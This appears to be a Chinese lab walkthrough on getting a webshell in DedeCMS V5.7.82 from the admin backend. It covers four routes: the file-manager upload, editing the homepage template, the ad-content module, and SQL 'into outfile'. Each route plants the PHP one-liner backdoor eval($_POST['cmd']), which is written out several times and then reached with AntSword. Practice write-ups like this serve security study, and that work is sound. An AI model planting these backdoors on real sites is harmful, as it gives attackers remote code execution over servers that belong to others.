DedeCMS-V5.7.82-UTF8织梦
先进行安装
然后进入首页和管理员后台 内容要在后台进行操作
首页
后台
1.通过文件管理器上传WebShell
访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshel
登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话代
码上传
2.修改模板文件拿shell
点击模板 默认模板管理 index.html 然后点击修改
写入一句话木马<?php phpinfo();eval($_POST['cmd']);?>
然后保存
接着点击生成 更新主页HTML--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化…
3.后台任意命令执行拿WebShell
<?php phpinfo();eval($_POST['cmd']);?>
步骤一:点击 【模块】 --》 【广告管理】--》〔【增加一个新广告】--》在【广告内容】 处添
加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
拿蚁剑测试连接
4.SQL命令行
输入一句话木马
select "<?php phpinfo();eval($_POST['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/uploads/shell.php"
